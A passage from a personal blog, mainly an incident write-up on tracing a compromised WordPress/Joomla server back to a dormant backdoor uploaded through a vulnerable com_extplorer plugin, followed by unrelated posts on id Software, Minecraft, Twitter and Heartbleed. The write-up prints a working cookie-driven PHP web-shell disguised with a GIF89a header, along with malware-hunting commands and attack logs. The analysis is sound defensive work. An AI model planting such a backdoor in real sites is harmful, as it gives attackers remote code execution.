    This would prevent whatever was rewriting my file to rewrite it. Unless it was also running as root, which would be a bigger problem. But at this point I had no reason to assume another user than the webuser was causing this. So let’s check the error.log, shall we?

    [Thu Nov 05 14:49:33 2015] [error] [client] PHP Warning: chmod(): Operation not permitted in /var/www/piks.nl/wordpress/wp-includes/nav-menu.php on line 538
    [Thu Nov 05 14:49:33 2015] [error] [client] PHP Warning: file_put_contents(/var/www/piks.nl/wordpress/wp-includes/../.htaccess): failed to open stream: Permission denied in /var/www/piks.nl/wordpress/wp-includes/nav-menu.php on line 539
    [Thu Nov 05 14:49:33 2015] [error] [client] PHP Warning: chmod(): Operation not permitted in /var/www/piks.nl/wordpress/wp-includes/nav-menu.php on line 540
    [Thu Nov 05 14:49:33 2015] [error] [client] PHP Warning: touch(): Utime failed: Operation not permitted in /var/www/piks.nl/wordpress/wp-includes/nav-menu.php on line 544

    Aha, well this is obvious, nav-menu.php is trying to rewrite my .htaccess file. But nav-menu.php is a regular WordPress file, so what’s up? Let’s check the content of the file. It seemed extra PHP code was added to the top of the file that rewrote the .htaccess file AND also tried contacting an external server. Something that could be observed with a tcpdump.

    tcpdump -i eth0 -n port 80
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
    15:13:07.917228 IP myclientip.59912 > 149.210.186.110.80: Flags [.], ack 1, win 16425, length 0
    15:13:07.917479 IP myclientip.59912 > 149.210.186.110.80: Flags [P.], seq 1:634, ack 1, win 16425, length 633
    15:13:07.917507 IP 149.210.186.110.80 > myclientip.59912: Flags [.], ack 634, win 992, length 0
    15:13:07.918554 IP 149.210.186.110.80 > myclientip.59912: Flags [P.], seq 1:335, ack 634, win 992, length 334
    15:13:07.927313 IP myclientip.59912 > 149.210.186.110.80: Flags [P.], seq 634:1880, ack 335, win 16341, length 1246
    15:13:07.964289 IP 149.210.186.110.80 > myclientip.59912: Flags [.], ack 1880, win 1148, length 0
    15:13:08.073720 IP 149.210.186.110.50809 > 195.28.182.78.80: Flags [S], seq 1257405992, win 14600, options [mss 1460,sackOK,TS val 431078511 ecr 0,nop,wscale 4], length 0

    Well excuse me! But that last line is wrong: 149.210.186.110.50809 > 195.28.182.78.80. My webserver is contacting a different webserver (like it’s a client instead of a server). Not what I want! I don’t know why or what for it does that but this is not normal.

    So OK, I know what is causing the .htaccess rewrite but HOW did the nav-menu.php file get changed?! This is where my headache sort of started. WordPress was up to date, all plugins were OK, I couldn’t figure it out. How did this happen? A couple of months ago I changed things around a bit, installed several themes and plugins and deleted just as many. My guess was that I used a faulty plugin (that I maybe already deleted). But which one? The logs didn’t give any explanation.

    Sucuri and Wordfence

    While trying to debug this I came across two excellent tools. When you run a WordPress site you should install Sucuri Security and Wordfence. They will help you.

    Sucuri can scan your site and check the regular WordPress files against your files to tell which are different (nav-menu.php popped up of course).

    Sucuri does a lot more, but this was helpful. Wordfence was also helpful, it can provide the same thing but it can also email you when files change or when user try to hack/login to your admin account. Very handy. (And this tool can also do a whole lot more).

    But, both tools didn’t provide an answer.

    After googling a bit, I ran into this site. This script recursively checks ALL your files and will order them with the newest on top. Very, VERY handy. Because I noticed that when you ls a directory you will get different timestamp than the actual last modified time. It’s a little trick to mess with you. This way a hacker will hide modified scripts from you, because naturally you would look for recently changed files. And this script will cut right through that! (Using stat on Linux will also show you the right dates.)

    So yes, nav-menu.php showed up. But nothing else. So no answers. Then it began to dawn on me. I host a few other sites running on the same server. What if one of those sites was hacked and infected my WordPress site. Of course! That had to be it. Even more so because one of those sites is a Joomla 1.5 installation (with reason). So let’s install the file_list_4_sort_by_date.php script on those sites.

    Pop pop pop. This didn’t look good. The Joomla site was indeed hacked and there were a whole lot of randomly placed of files on the site. Oh no. However, this all seemed to have happened in the last 48 hours. And it was done in such a way that the actual site was operating perfectly (as opposed to my WordPress site). But it was an ugly mess. Several different backdoors, which got hit by hundreds of different (of course spoofed) IP addresses, to upload even more backdoors and phishing pages. Time to clean up! (And find out what/how caused this!).

    Eval = evil (as is base64_encode)

    So I’m stuck with a whole bunch of new scripts but worse there are also script lines added to my own/existing files. So those are a whole lot trickier to clean. I need to make sure my all PHP files can’t be edited anymore (I should have done this sooner):

    find . -type f -name "*.php" | xargs chmod 444

    So that takes care of that. Some files are easy to figure out if they need to be there, others not so much. This is why Wordfence/Sucuri is so awesome. But I couldn’t really find such a plugin for Joomla. So I had to manually diff it. Luckily I make rsync backups of my server, so I could diff the entire content of the backup to the current site

    diff -r mybackupdirectory thecurrentsitedirectory

    This showed me the differences and I could just delete the added files. For the files that were changed here is what sticks out. They’re usually using the PHP ‘eval‘ function (if you find a PHP script that uses the eval function, beware!). And more so; they use the ‘base64_encode‘ function. What this does it makes the script unreadable to humans (normally this function is used to transport binary data e.g. photos as text). This is to make sure that when you get your hands on these scripts/backdoors, you can’t really tell what they do. And yes you can decode it, but what if the decoded text is also base64 encoded and that is also encoded etc. etc. And on top of that they encrypted the file with this:

    $calntd = Array('1'=>'N', '0'=>'m', '3'=>'I', '2'=>'x', '5'=>'e', '4'=>'J', '7'=>'a', '6'=>'L', '9'=>'6', '8'=>'c', 'A'=>'p', 'C'=>'u', 'B'=>'W', 'E'=>'3', 'D'=>'T', 'G'=>'t', 'F'=>'K', 'I'=>'4', 'H'=>'M', 'K'=>'E', 'J'=>'X', 'M'=>'R', 'L'=>'k', 'O'=>'1', 'N'=>'V', 'Q'=>'Y', 'P'=>'Q', 'S'=>'G', 'R'=>'P', 'U'=>'U', 'T'=>'B', 'W'=>'w', 'V'=>'0', 'Y'=>'S', 'X'=>'v', 'Z'=>'y', 'a'=>'g', 'c'=>'O', 'b'=>'f', 'e'=>'F', 'd'=>'l', 'g'=>'C', 'f'=>'2', 'i'=>'j', 'h'=>'7', 'k'=>'8', 'j'=>'i', 'm'=>'h', 'l'=>'5', 'o'=>'q', 'n'=>'z', 'q'=>'d', 'p'=>'o', 's'=>'D', 'r'=>'r', 'u'=>'H', 't'=>'b', 'w'=>'A', 'v'=>'9', 'y'=>'n', 'x'=>'Z', 'z'=>'s');
    So yes in theory you could decode it and decrypt it. But at this point who cares? You can run these commands to get a list of what PHP files on your system use these functions (some are legit, although very few):
    find . -type f -name "*.php" | xargs grep eval\(
    find . -type f -name "*.php" | xargs grep base64_encode
    So yeah, this helped finding infected files and cleaning up the mess. But where did this start? If you can upload one file you can upload the rest and take control. But where and how did this happen. It is pretty hard to debug the logs because a hacker will use different spoofed IP addresses. So there can be 2000 log lines all from  different addresses. But the key is to look for POST log lines. Most webserver commands are GET command, but when something is trying to upload/change something this will be done with a POST command.
    grep POST /var/log/apache2/access_log

    As said there were a bunch of different IPs and POST lines. So this made it tricky.

    But one of the earliest log lines before the mess started was this:

    78.138.106.243 - - [04/Nov/2015:12:22:39 +0100] "GET / HTTP/1.1" 200 84301 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:12:23:22 +0100] "GET / HTTP/1.1" 301 559 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:12:49:58 +0100] "GET /.config.php HTTP/1.1" 200 4769 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:12:51:38 +0100] "GET /.config.php HTTP/1.1" 301 581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:12:51:39 +0100] "GET /.config.php HTTP/1.1" 200 4769 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:01:08 +0100] "GET /.cpanel_config.php HTTP/1.1" 404 481 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:01:46 +0100] "GET /.cpanel_config.php HTTP/1.1" 301 595 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:01:46 +0100] "GET /.cpanel_config.php HTTP/1.1" 404 489 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:07:12 +0100] "GET /images/.jindex.php HTTP/1.1" 404 481 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:07:56 +0100] "GET /images/.jindex.php HTTP/1.1" 301 595 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:07:56 +0100] "GET /images/.jindex.php HTTP/1.1" 404 489 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:42:37 +0100] "GET /.config.php HTTP/1.1" 200 202 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:43:53 +0100] "GET /.config.php HTTP/1.1" 301 581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:43:53 +0100] "GET /.config.php HTTP/1.1" 200 202 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:55:09 +0100] "GET /components/com_content/models.php HTTP/1.1" 200 507 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:55:28 +0100] "GET /components/com_content/models.php HTTP/1.1" 301 625 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:55:28 +0100] "GET /components/com_content/models.php HTTP/1.1" 200 507 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:14:01:42 +0100] "POST /components/com_content/models.php HTTP/1.1" 200 385 "-" "Mozilla/5.0 (X11; U; Windows XP; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1"
    78.138.106.243 - - [04/Nov/2015:14:01:42 +0100] "POST /components/com_content/models.php HTTP/1.1" 200 410 "-" "Mozilla/5.0 (X11; U; Windows XP; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1"
    78.138.106.243 - - [04/Nov/2015:14:02:15 +0100] "POST /components/com_content/models.php HTTP/1.1" 301 625 "-" "Mozilla/5.0 (X11; U; Windows XP; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1"
    Well excuse me! How can this be? A couple of wrong/non-existing/404 GET commands followed by two successful/200 GET commands to a file called .config.php and then BOOM a successful POST to a never before seen file, called models.php, which is a backdoor. How, what, wait, why, uh?

    What is this .config.php file?

    This file didn’t pop up from the earlier diff. So my guess was this was a regular Joomla file that was always there. Let’s have a closer inspection.

    GIF89a
    <?php
    /**
     * @package     Joomla.Plugin
     * @subpackage  system.instantsuggest
     *
     * @copyright   Copyright (C) 2013 InstantSuggest.com. All rights reserved.
     * @license     GNU General Public License version 2 or later
     */
    /**
     * Instant Suggest Ajax
     *
     * @package     Joomla.Plugin
     * @subpackage  system.instantsuggest
     * @since       3.1
     */
    class PlgSystemInstantSuggest
    {
            public function __construct() {
                    $filter = @$_COOKIE['p3'];
                    if ($filter) {
                            $option = $filter(@$_COOKIE['p2']);
                            $auth = $filter(@$_COOKIE['p1']);
                            $option("/123/e",$auth,123);
                            die();
                    }
            }
    }
    $suggest = new PlgSystemInstantSuggest;

    This doesn’t look good. For several reasons:

    1. It’s  a strange name: .config.php
    2. The first line says GIF89a. But this is definitely not a GIF file. Usually adding such a ‘header’ is to fool anti-viral programs.
    3. This function PlgSystemInstantSuggest isn’t used anywhere on the site. How do I know this? Because this came up empty
    find -type f -name "*.php"| xargs grep PlgSystemInstantSuggest

    Google explained it.

    So this file doesn’t belong here and was apparently the start of all this trouble. But still the question remained. How did it get here! Let’s check the creation date:

    # stat .config.php
    File: `.config.php'
    Size: 661 Blocks: 8 IO Block: 4096 regular file
    Device: fe01h/65025d Inode: 2623182 Links: 1
    Access: (0444/-r--r--r--) Uid: ( 33/www-data) Gid: ( 33/www-data)
    Access: 2015-11-09 09:48:30.620041031 +0100
    Modify: 2015-01-21 18:55:29.062864009 +0100
    Change: 2015-11-07 19:16:00.832040969 +0100

    January 21 you say? Let’s check the logfiles (yes, I keep those around).

    88.198.59.38 - - [21/Jan/2015:18:55:28 +0100] "GET /administrator/components//com_extplorer/ HTTP/1.1" 200 5210 "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"
    88.198.59.38 - - [21/Jan/2015:18:55:28 +0100] "POST /administrator/components//com_extplorer/ HTTP/1.1" 301 534 "http://www.staatsbladen.nl/administrator/components//com_extplorer/" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"
    88.198.59.38 - - [21/Jan/2015:18:55:29 +0100] "POST /administrator/components//com_extplorer/ HTTP/1.1" 200 447 "http://www.staatsbladen.nl/administrator/components//com_extplorer/" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"

    And a snippet from the error.log:

    [Wed Jan 21 18:55:28 2015] [error] [client 88.198.59.38] PHP Strict Standards:  Non-static method ext_File::closedir() should not be called statically in /var/www/wp.nl/administrator/components/com_extplorer/include/functions.php on line 1169
    [Wed Jan 21 18:55:28 2015] [error] [client 88.198.59.38] PHP Strict Standards:  Non-static method ext_Lang::msg() should not be called statically in /var/www/wp.nl/administrator/components/com_extplorer/include/login.php on line 82
    [Wed Jan 21 18:55:28 2015] [error] [client 88.198.59.38] PHP Strict Standards:  Non-static method ext_Lang::_get() should not be called statically in /var/www/wp.nl/administrator/components/com_extplorer/application.php on line 63
    [Wed Jan 21 18:55:28 2015] [error] [client 88.198.59.38] PHP Strict Standards:  Non-static method ext_Lang::msg() should not be called statically in /var/www/wp.nl/administrator/components/com_extplorer/include/login.php on line 109
    And THERE.WE.GO.

    The com_extplorer plugin was abused to upload ONE file in January of this year. This sat around for almost ten months doing nothing! Until the hacker (or someone else) came across it and abused it.

    Needless to say com_extplorer is as old and as vulnerable as they come. I don’t even know why I had it. Trust me, it is gone (and Joomla is of course updated)!

    So there you have it. Quite a ride. My webserver/sites were hacked because of a dormant file uploaded ten months ago through a buggy Joomla file explorer plugin for a site that I host. I don’t think it is necessarily the same hacker that uploaded the file that started messing with my sites last week. It also looks a bit like bots/generators that continuously scan sites and execute standard commands. It can be one guy or more. Based on the spoofed IP’s you can’t really tell.
    Strangest part about this is that I only found out because my WordPress site that was acting strange. The Joomla site was fine. If this hadn’t happened I wouldn’t have found out (or much later). Also the thing the WordPress site was doing was quite useless (it was redirecting to my own site). I think someone/something (a script) messed up. And the Joomla site was serving a whole bunch a spam pages so it was in the interest of whoever uploaded those that the server would keep running and that the backdoors would be unnoticed. And that might have happened if I didn’t start investigating the WordPress site. This whole story shows that your entire webserver is as secure as the weakest part.

  • Masters of Doom

    On my last vacation I finally got around to reading Masters of Doom by David Kushner. This book from 2003 keeps popping up every now and again and people always rave about it. I put it on my Amazon wish list years ago (which holds 50 books atm). But recently I came across it again, so it was time.

    And boy, what an absolute pleasure to read, it was. From start to finish. It’s the story of id Software and mainly the two Johns (Carmack and Romero)  the 2 founders who, as the books’ subtitle states, transformed pop culture with their games. This is not a lie. id Software single handedly created the FPS genre with their Wolfenstein 3D, Doom and Quake games and were responsible for introducing the PC in the 90s as a serious (gaming) platform.

    Wolfenstein 3D

    This is not a book review. Just read the book, trust me you’ll enjoy it. There are a gazillion (positive) reviews available. This post is just a list of things that struck me while reading this masterpiece.

    • Arcade machines ruled the earth. Before anything else. I myself am too young to have experienced this phase. And I never understood why that was. What makes an arcade machine so different. This books explain it a bit.
    • The Apple II ruled after that. It is striking how important the Apple II and its programming environment were for both young Johns. It is the spark set the flame.
    • After the first successes with id Software, Carmack was very keen on getting a NeXT computer (a machine created by, of course, Steve Jobs). He did most of his programming on this (Note: Tim Berners-Lee created the WWW on an NeXT machine).
    • But the Apple II and subsequent the PC were really expensive and unattainable for both Johns. Carmack was even arrested for stealing one (and did time), and even when they started to have some success and were (secretly) starting id Software they ‘stole’ PC´s from their employer because they still couldn’t afford their own.
    • Carmack often says how different the world is now: just get a cheap PC, internet and a Linux distro and you’re good to go. You can go and “create things from thin air”. But this is something we take so much for granted now, that the value of it seems lost. I can’t shake the feeling that being withheld from access to a PC for so long has solidified Carmacks’ appreciation, interest and relation with a PC (deprivement pushes innovation).

      Doom
    • Nintendo Super Mario Bros from 1983 was so far ahead its time, that it’s hard to put into perspective nowadays. Mario, a continuous sidescroller game, was never done before and it took John Carmack several years before he could emulate this on a PC. I never realised this. Nintendo was on another level.
    • When Carmack figured out how to do sidescrolling, their whole team recreated the entire Mario game in a weekend (!) and offered it to Nintendo. They were impressed but weren’t interested in the PC market.
    • So their sidescrolling technique turned into: Commander Keen. Which was a massive success. (I myself spent many hours playing Keen, it was my introduction to gaming).

      The first Commander Keen game
    • John Carmack is one of a kind. He invented so.many.things. He created the foundation of a stupendous amount of techniques that are still in use in almost every current game (lighting, shading, networking, multiplayer etc. etc.). And he was so young while doing all that (On the other hand: Linus was also just 21 when he put out a kernel: “won’t be big and professional”)
    • My respect for Carmacks’ technical abilities has only grown with this book. But I can’t deny he sometimes comes off as somewhat sociopathic. With little regard for other peoples’ feelings (especially when he was younger). He lives and cares only about the now and the future and programming. The past seems utterly irrelevant to him (he didn’t even keep copies of his first games). But hey, maybe that combination is what drives innovation.
    • What I really liked about him though was/is his stance on open source software and anti-patent views. The book Hackers (which I completely incidentally bought at the same time as I bought this book!) was a great influence to young Carmack and shaped his views on software. A lot of his techniques and engines are open sourced, but he also encouraged the modding and hacking of their games (I argue that this added to their success).

    6521original_gnlv5
    id Software

    • Shareware was also a large part of their success. Give away the first levels for free, and ask users to pay for the rest. This worked out really well for them, but this was before the internet that we know now where you can get anything (illegal). (Though Notch sort of did the same trick with Minecraft I guess). But I clearly and vividly remember that this is how I got Wolfenstein 3D myself as a 13/14 year old. It was a 3,5″disk attached to a PC magazine that I bought on vacation. Being very interested in anything WW2 related, this magazine stood out. And the game struck a cord with me, I played it many times on our 386SX and I always marvelled at how people could create something like this (3D!). (Fun and true fact: on the plane reading this book the guy in front of me was playing Wolfenstein 3D on his tablet. Such a surreal experience.)
    • When id Software was coming up, the internet was just getting started, there were newsgroups, FTP and BBS. But that was about it. Imagine the kind of  earthshattering experience the first networked multiplayer game must have been: Doom. (It was then that Romero coined the term deathmatch).
    • The board game Dungeons & Dragons is very very important in id Software history and game concepts. A lot of elements in their games can be traced back to D&D. All early employees were avid players. I did not know this.
    • Games push innovation. You might not care about games (Carmack himself grew disinterested in games as the company grew) but games are largely responsible for driving and pushing the PC where it is nowadays.
    • Virtual Reality was already a thing people were working on and thinking about, in the 70s, 80s, 90s. It never worked. Carmack left id Software 2 years ago to work on the Oculus Rift VR. This could be it. The time might be now. Technology might finally be ready. And if there would be only one person in the world that could pull it off then you can rest assure, that person is working on it right now: John Carmack.

      Do it, John.

    I could go on about the pizza and diet Coke addictions or the interesting relation/energy between Romero and Carmack, that they were a perfect match that pushed each other but also as they both grew, they grew apart. Or how Doom integrated in everyday life and was subject of critical outrcy following the Columbine shooting. But just read the book for yourself (or read about it herehere or here). It is ultimately a book about a couple of guys that started from the bottom and created a startup which in turn created an industry. A classic Silicon Valley rags to riches story.

  • The Minecraft timeline

    The story of Minecraft sounds like a great movie script. Notch as the protagonist genius programmer, who, from an underdog (indie) position, single handedly changed the game industry by just doing what he loved. And, making a lot of money along the way. And even more money when he was fed up with it all and sold Minecraft.
    But perhaps a movie is unnecessary, it is all very well documented already. And most people are familiar with the story. Partly because a lot of that story happened online. So we have the blogs, websites, forum posts, tweets and youtube videos. What we don’t have is a nice graphic timeline depicting the history (until now).I heard about Minecraft somewhere in 2010. And I started paying close attention to Minecraft and its creator. Because even then it seemed like a great story. One guy and his computer changing the world. My favorite kind of story! And I clearly remember being awestruck on August the 20th 2011, when Notch entered a game coding contest and livecasted the whole thing, which he did regularly. (Mind you, the link is a condensed version, the whole thing lasted 48 hours). This guy was something else! The wonders of game creation unfolded right before your eyes. Way too fast to get it all, but it gave a great sense of what it means to create a game. Just him, and his computer with Java IDE Eclipse and Paint.net. The same tools he used when creating Minecraft. (I later found out, trough that contest, that there are many more competent programmers like him. Not everyone strikes gold. But then again, like Notch, most of them are not in it for that reason).

    Minecraft is a unique story that deserves a nice looking timeline, and because I couldn’t find a decent one I made one:

    The information on this timeline is gathered from http://minecraft.gamepedia.com/

    Some noticeable things from this timeline.

    • Notch started working on Minecraft a few weeks before taking on a new job (at jAlbum: the software this site also uses!)
    • It took a year of development before he finally quit his ‘real’ job to focus on Minecraft. At that time somewhat 20.000 copies had already been sold! While the game was still only in alpha phase. Promising, to say the least.
    • The second half of 2010 and 2011 must have been insane. They created the company around Minecraft: Mojang, hired a lot of people, made a ton of updates to the game, released a second game (completely different), talked with Valve, organised MineCon, had a lawsuit on their hands, and amidst all that they sold millions of copies of Minecraft!
    • A lot of important Minecraft things seem to have happened on June 1 a couple of years in a row (this also happens to be Notch’s birthday).

    The Minecraft story isn’t finished yet. Minecraft is of course very much alive and still setting records. But where Notch and Minecraft once were part of the same story they are now moving into separate timelines.

    But whatever happens next, the story of Minecraft will always be an inspiring story and the impact on the game and entertainment industry will echo for years and years to come. That makes it even more special that trough the wonders of Youtube we have this video from 2009. Some unknown guy from Sweden showing a demo of something he built and that might turn into a game.

  • If I were the CEO of Twitter

    I still love Twitter. I’ve been using it since 2009 and it holds a special place. For reasons that I only recently learned to put in to place. Twitter is a protocol. It’s a (unique) way of communicating.

    I’m also still a big RSS user. Which is a different beast. Very useful, but a much more isolated experience. On Twitter you are connected and present in a visible manner. The RSS experience is much more like lurking in a dark corner. Nonetheless, there is room for that too. For me, Twitter and RSS are complementary to each other.

    Recently, there has been some unrest around Twitter. The stock is going down, the CEO has been replaced, and features are removed. That last part is what bothers me the most. It seems the new approach has been to dumb down Twitter as much as possible. I don’t like it. Maybe it’s going back to the roots of the core idea. Maybe it’s just trial-and-error management. I don’t know. But for me as a user I’d like to see new features. Features that don’t necessarily have to interfere with the core, basic Twitter experience, but that would improve and broaden the Twitter experience and time spent on Twitter. So if I were Twitter CEO I would add these.

    1. Improved, more selective, search

    I want to be able to search individual (including my own) timelines.  I can never seem to find anything on Twitter.

    2. Diary (News Archive)

    I want to be able to select a date and see my timeline from *that* date. What did it look like last New Years eve, or when the MH17 went down? I think such a feature would be pretty great.

    3. Favorite vs. “like”

    I want to be able to acknowledge tweets that I enjoyed. Yes, there is the favorite button. But for me favoriting is the equivalent of bookmarking. I favorite things I want to get back to. So I don’t want to dilute my bookmarks with “likes”. So I’m strict with favoriting. I think there should be another/different button/heart.

    To me it seems Twitter is struggling with this. I believe favoriting started of as bookmarking but people raised on Facebook took it for the Like button and Twitter just let that happen. If there was another way of letting people know that I enjoyed their tweets there would be much more activity. From me at least. Favoriting something is a big deal: because it is stored in my favorite timeline forever and for all the world to see. Liking, not so much. I believe this to be one of the reasons of the Instagram success. The way they implemented their “like” feature, it’s low key and I don’t need to see what it was that I liked again.

    4. Curated feeds

    Until recently Twitter had a special (Activity) feed that let me see what people from my timeline favorited. Even though I don’t use the favorite button like that myself (as explained) I loved this. That was a great feed and this is were I spent most of my time. That feed was like crack to me, because it is addictively more interesting to see what someone interesting finds interesting. For me, this is where 70% of the good stuff was. That feature is gone. I understand it might not be for everyone, but people like me lived here.

    Part of this problem might be that a lot of people merely seem interested in talking/yelling on Twitter so they have no interest in listening to others.

    Also, Twitter could use this like info to show me the best tweets for a certain period. Say I have been away on vacation without an internet connection, just let me see the good stuff for the last month.

    And this same mechanism could also be used to filter the sense from the nonsense. I worry that a lot of (young) people seem to hit every follow button they come across, after which their Twitter timeline becomes an uncontrollable mess (bots with 100’s of tweets/day) to which they never return. Too much hassle. I’m very selective who to follow and to keep a readable timeline. Again: this is me. But it is part of a larger problem on Twitter to create a better experience where the better content sticks out more. Snapchat specifically and probably incidentally deals with this problemStuff is just gone after a certain period.

    (By the way, the day Twitter decides what I see on my timeline and what I don’t (like Facebook) is the day I’m leaving Twitter.)

    5. Circles

    Yes, Google+ is turning out to be quite the debacle for Larry Page and friends. But I believe they got at least one thing right. Circles! Because of the mixed crowd that follows me on Twitter, I’m sort of selective in what I tweet. If I could make groups and choose which tweets are visible for which group I would certainly tweet more and so would more people I assume.

  • Thoughts on Heartbleed

    This week, part of the internet broke. Again. Some important people even called it an 11 on a scale from 1 to 10. And I don’t disagree. After the recent Apple goto fail SSL bug and NSA RSA debacle this was actually worse.

    So everyone agreed on that. But 3 things, regarding open source software, stood out for me from all this.

    1. OpenSSL is a great example of just one open source product that makes up for an incredibly fundamental part of the internet. But it is not a sexy project, (so) it doesn’t have a ton of developers. And now that it broke we’ve seen the enormous impact that this piece of software, that is developed by only a handful of people, has on the lives of billions of people. Think about that for a minute. Every major website that I visit or that I am subscribed to has emailed me to change my passwords. And they’re not just emailing me alone. And this is just one open source product developed by a small team that receives about $2000 in donations per year!

    I think it speaks volumes of the power of open source and the impact you can make in contributing to it. I think that is quite magical.

    2. After the Heartbleed announcement the sentiment was: go update your OpenSSL packages and revoke en reissue your certificates!

    Great. Makes sense right?

    No. No not really. Why on earth would we trust the OpenSSL codebase ever again after this disaster?! Theo de Raadt calls the developers irresponsible and the respected author of Varnish wrote about the mess that is the OpenSSL codebase three years ago. He wouldn’t touch it with a ten foot pole. Yet, the overall sentiment seems to be that if you update your OpenSSL stack and revoke/reissue your certificates you’re fine. Really?! What else is in there?!

    Part of the problem here is that there are no real alternatives. There are a couple of other SSL/TLS implementations, but that route seems more complicated than to update OpenSSL. So everyone is still using OpenSSL. But also, and this is very important, because no-one seems to distrust the intentions of the OpenSSL team (there were some NSA related conspiracy stories: but they got debunked). So it looks like “OpenSSL messed up, we fixed it, let’s move along”. And that is a good thing.

    So what happens next? Are more people reviewing the code? Are more donations coming in to fund this fundamental part of the internet (and therefore our lives)? I sure hope so. Also for the people that discovered the bug (two different people), I hope they will use their skill to inform vendors/distros first before picking a catchy name, registering a domain and creating a fancy logo to announce a big problem to the world. At least it looks like they’re trying to help now. And they didn’t sell it to blackhats (I think).

    3. So even though we have the source and we can look at it; the codebase is large and messy. In my estimate this is not unusual for open source projects with a long history. (However the consequences for security related projects tend to be bigger.) So this problem went unnoticed until someone pointed it out. Therefore more people looking at it and more time dedicated to it would make it (incrementally) better I think. But, there will always be bugs.

    So which is it?

    And that is the other side of open source software and software in general. Software is ‘OK’ until someone points out the bug. And everybody thought OpenSSL was secure. Until it wasn’t.

    It’s almost like Schrödingers’ cat paradox. Like software can be two things at once. We all trusted OpenSSL, it was after all the very definition of security. Until proven otherwise. And the bug was just ‘always’ right there.

    So I’d like to argue this: all software is broken by default. And all we can do is be on the lookout and fix problems when they arise.

    And at least in the case of OpenSSL we can look at the code and make it better. And I wouldn’t want it any other way.

  • jan.usesthis.com

    I always enjoy reading usesthis.com. Especially from “software people”. And I am always a bit surprised when I read what hardware some people use >8 hours a day. Some people really use some old stuff! You’d sort of expect when you spend that much time working/interacting with tools you want the best (newest?) tools. But then I realised, I’m probably no different myself. So, since no-one asked I’m going to do my own usesthis.com!

    Who are you, and what do you do?

    I am Jan and I work for a national ISP (ranked among the top 🙂 ). I started as a systems and networking engineer and the last couple of years I’m responsible for the Engineering department. Where we both create and maintain ISP based services (mail, hosting, connectivity, IP TV, VoIP, Mobile etc.)

    What hardware do you use?

    My everyday workhorse machine is a Dell Latitude D820 from august 2006! It still runs the original XP installation (that will have to change soon). It is fast and stable. The only upgrade has been that I added a SSD 2 years ago. (Best investment ever. Get one. Now). I use this machine 8 hours a day. People often ask why XP, or why such an old laptop? But it just works. You can have all kind of fancy setups but I have never seen anyone pull up files faster, find an email, hit a link, or SSH to a host faster than myself. And if  you have a trick or keycombo that will do things — even just a tiny bit — faster, trust me, I will steal it from you.

    The machine is hooked up to a Dell u2211H screen. I literally found this screen somewhere in one of our offices ~4 years ago and it has been with me since. Mouse and keyboard are also as old as I can remember. Both Logitech. Probably my 2nd mouse/keyboard in my 10+ years here.

    At home I use a 2010 stock Lenovo Thinkpad SL510. Great keyboard! Windows 7 that came with it was OK. But it got slower each month. So I have been a rather happy Lubuntu user since. But if my Dell Inspiron 6400 from 2006 hadn’t broken I’d probably still be using that. Lubuntu 13.10 is fast, the opposite of bloated and Debian based (I nee apt). So it does the trick. (If you still don’t know what to do now that XP is going,  you should give it a try.)

    I have an iPhone 4 16GB. So that’s a 4, not a 4s. I  got this because my 3Gs fell in the toilet 2 years ago. It works.

    Last year I got an iPad Mini which goes with me everywhere. There hasn’t been a day since that I didn’t use it. I have a lot of meetings and this thing is perfect for that. I tried a regular sized iPad before but found it too big/clunky. The Mini is the perfect size for reading meeting notes, agendas etc.

    Both Apple devices still run iOS6. Why? You guessed it: speed.

